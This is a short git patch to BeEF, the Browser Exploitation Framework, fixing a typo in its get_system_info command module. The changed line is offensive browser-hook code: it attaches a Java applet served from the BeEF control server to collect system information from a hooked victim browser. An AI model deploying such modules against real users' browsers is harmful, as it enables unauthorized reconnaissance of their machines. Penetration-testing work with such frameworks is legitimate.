From f2883e0c94b4f7d7445dae0bc6e1714ca0d7db6b Mon Sep 17 00:00:00 2001 From: bcoles Date: Fri, 9 Aug 2013 13:34:24 +0930 Subject: [PATCH] Fixed typo Extra 'i' from vim insert mode --- modules/host/get_system_info/command.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js index 61cddde05..03fc0ae21 100644 --- a/modules/host/get_system_info/command.js +++ b/modules/host/get_system_info/command.js @@ -10,7 +10,7 @@ beef.execute(function() { var timeout = 30; var output; - beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', ibeef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null); + beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null); if (beef.browser.isFF()) {